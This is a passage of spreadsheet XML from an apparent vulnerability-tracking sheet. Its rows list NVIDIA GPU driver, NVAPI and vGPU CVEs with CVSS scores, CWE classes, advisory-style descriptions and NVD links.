      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47559</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could access memory belonging to another user's process. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47559</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47560</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47560</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47561</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where the size of an ioctl input buffer is not validated, allowing an unprivileged caller to trigger an out-of-bounds write in kernel memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47561</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47563</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47563</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47569</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a type confusion via a handle recycle race. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47569</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47570</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the CUDA driver where an attacker could cause a library to be loaded from an uncontrolled search path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47570</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47571</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in kernel-mode escape handling where an attacker with local access could bypass an authorization check that is intended to restrict certain operations based on client execution context. A successful exploit of this vulnerability might lead to escalation of privilege, information disclosure, data tampering, denial of service, or code execution.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47571</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47572</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47572</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47573</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>NVIDIA NVAPI for Windows contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47573</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47574</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability where an attacker could cause incorrect resource transfer between spheres. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47574</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47575</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the display driver DIAG escape handler where a local unprivileged attacker may cause an integer overflow and out-of-bounds write. A successful exploit of this vulnerability might lead to denial of service, and code execution.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47575</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47577</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an incorrect comparison. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47577</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47578</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause an incorrect buffer size calculation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47578</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47579</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode driver through which a user might trigger a use-after-free condition. Successful exploitation of this issue could lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47579</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47583</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47583</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47585</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47585</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47587</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
